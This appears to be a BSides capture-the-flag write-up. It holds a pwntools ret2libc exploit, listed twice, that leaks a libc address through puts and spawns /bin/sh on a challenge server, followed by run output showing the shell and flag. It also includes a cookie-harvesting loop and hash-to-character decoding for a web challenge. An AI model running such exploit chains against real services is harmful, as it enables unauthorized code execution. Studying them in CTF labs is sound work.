Thanks for attending BSides, have a nice day!
$ ./chall
It's been fun, but here we are at the final challenge!
May I know your name?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
It's been nice meeting you, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
Segmentation faultfrom pwn import *
elf = context.binary = ELF('./chall')        # target binary; context.binary also sets the arch/bits used by flat() and u32()
if args.REMOTE:
    p = remote('13.233.104.112', 2222)       # challenge server, selected with `REMOTE` on the command line
    libc = ELF('./libc-remote.so')           # libc shipped for the remote target
else:
    p = process()                            # run ./chall locally
    libc = elf.libc                          # the local loader's libc

# NOTE(review): this chain depends on a fixed PLT address (0x080490a0) and 4-byte
# words (u32), i.e. a 32-bit non-PIE build, and on a 40-byte overwrite reaching the
# saved return address without tripping a stack canary (the plain segfault in the
# transcript suggests there is none) — confirm with checksec. PIE and a stack
# canary are the build-side mitigations that would break this chain as written.

# Stage 1: leak a libc address by returning into puts(puts@GOT), then back to main
# so the program asks for a name a second time.
payload = flat(
    'A' * 40,          # fill the buffer up to the saved return address
    0x080490a0,        # puts@PLT
    elf.sym['main'],   # where puts returns to
    elf.got['puts']    # puts' argument: the GOT slot holding puts' libc address
)
p.recvuntil('name?\n')  # wait for the "May I know your name?" prompt
p.sendline(payload)
p.recvline()            # discard the "It's been nice meeting you, AAAA...!" echo line
puts_leak = u32(p.recv(4))  # puts prints the GOT slot; its first 4 bytes are puts' address in libc
log.success(f'Puts@libc: {hex(puts_leak)}')
libc.address = puts_leak - libc.sym['puts']  # rebase libc on the leaked symbol
log.success(f'libc: {hex(libc.address)}')
p.clean()               # drop the output of the re-run main before stage 2

# Stage 2: same overwrite, now returning into system("/bin/sh") with exit as
# system's return address so the process ends cleanly afterwards.
payload = flat(
    'A' * 40,
    libc.sym['system'],
    libc.sym['exit'],
    next(libc.search(b'/bin/sh'))  # address of a "/bin/sh" string inside libc
)
p.sendline(payload)
p.interactive()
from pwn import *  # the same script is listed a second time below
elf = context.binary = ELF('./chall')  # target binary; context.binary also sets arch/bits for flat() and u32()
if args.REMOTE:
    p = remote('13.233.104.112', 2222)  # challenge server (run as `python3 exploit.py REMOTE`)
    libc = ELF('./libc-remote.so')      # libc shipped for the remote target
else:
    p = process()                       # run ./chall locally
    libc = elf.libc                     # the local loader's libc
# context.log_level = 'debug'

# NOTE(review): the hard-coded PLT address (0x080490a0) and 4-byte words (u32)
# indicate a 32-bit non-PIE binary, and the 40-byte overwrite must reach the saved
# return address without a stack canary firing (the transcript shows a plain
# segfault, which suggests none) — confirm with checksec. PIE and a stack canary
# are the build-side mitigations that would break this chain as written.

# Stage 1: leak puts' libc address by returning into puts(puts@GOT), then into
# main so a second name is read.
payload = flat(
    'A' * 40,          # buffer up to the saved return address
    0x080490a0,        # puts@PLT
    elf.sym['main'],   # return address for puts
    elf.got['puts']    # puts' argument: the GOT slot of puts
)
p.recvuntil('name?\n')  # wait for the "May I know your name?" prompt
p.sendline(payload)
p.recvline()            # discard the "It's been nice meeting you, ..." echo line
puts_leak = u32(p.recv(4))  # first 4 bytes printed from the GOT slot = puts@libc
log.success(f'Puts@libc: {hex(puts_leak)}')
libc.address = puts_leak - libc.sym['puts']  # rebase libc on the leaked symbol
log.success(f'libc: {hex(libc.address)}')
p.clean()               # discard the re-run main's output before stage 2

# Stage 2: same overwrite, now system("/bin/sh") with exit as system's return
# address; p.interactive() follows on the next line.
payload = flat(
    'A' * 40,
    libc.sym['system'],
    libc.sym['exit'],
    next(libc.search(b'/bin/sh'))  # a "/bin/sh" string inside libc
)
p.sendline(payload)
p.interactive()$ python3 exploit.py REMOTE
[+] Puts@libc: 0xf7dad3d0
[+] libc: 0xf7d46000
[*] Switching to interactive mode
It's been nice meeting you, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]
$ ls
chall
flag
run.sh
$ cat flag
BSDCTF{3xpl0r1ng_th3_unkn0wn}
User-agent: *
Disallow: /cookie.php"Our_Fav_Cookie=8de0b3c47f112c59745f717a626932264c422a7563954872e237b223af4ad643; Piece=6"from requests import Session
sess = Session()  # a Session keeps cookies between requests
# Keep requesting the page and print the cookies each response sets; the loop
# never ends on its own, stop it with Ctrl-C.
while True:
    response = sess.get('http://15.206.202.26/cookie.php')
    print(response.cookies.get_dict())
c4694f2e93d5c4e7d51f9c5deb75e6cc8be5e1114178c6a45b6fc2c566a0aa8c : O
f67ab10ad4e4c53121b6a5fe4da9c10ddee905b978d3788d2723d7bfacbe28a9 : F
4ae81572f06e1b88fd5ced7a1a000945432e83e1551e6f721ee9c00b8cc33260 : Q
5c62e091b8c0565f1bafad0dad5934276143ae2ccef7a5381e8ada5b1a8d26d2 : P
333e0a1e27815d0ceee55c473fe3dc93d56c63e3bee2b3b4aee8eed6d70191a3 : G
8de0b3c47f112c59745f717a626932264c422a7563954872e237b223af4ad643 : S
021fb596db81e6d02bf3d2586ee3981fe519f275c0ac9ca76bbcf2ebb4097d96 : {
5c62e091b8c0565f1bafad0dad5934276143ae2ccef7a5381e8ada5b1a8d26d2 : P
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 : 0
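[...]
# Keep only the cracked character: the second field of each "hash : char" line.
awk -F ' : ' '{print $2}' cracked > flag
# Join the characters onto one line. `tr` replaces the unquoted `$(cat flag)` loop,
# whose words were subject to pathname expansion (a cracked glob metacharacter such
# as '*' or '?' would have been matched against the working directory) and to the
# non-portable `echo -n`. The cracked values are single non-space characters, so
# the printed result is unchanged.
tr -d '\n' < flag
OFQPGS{P00x135_ne3_o35g_cy4p3_70_pu3px}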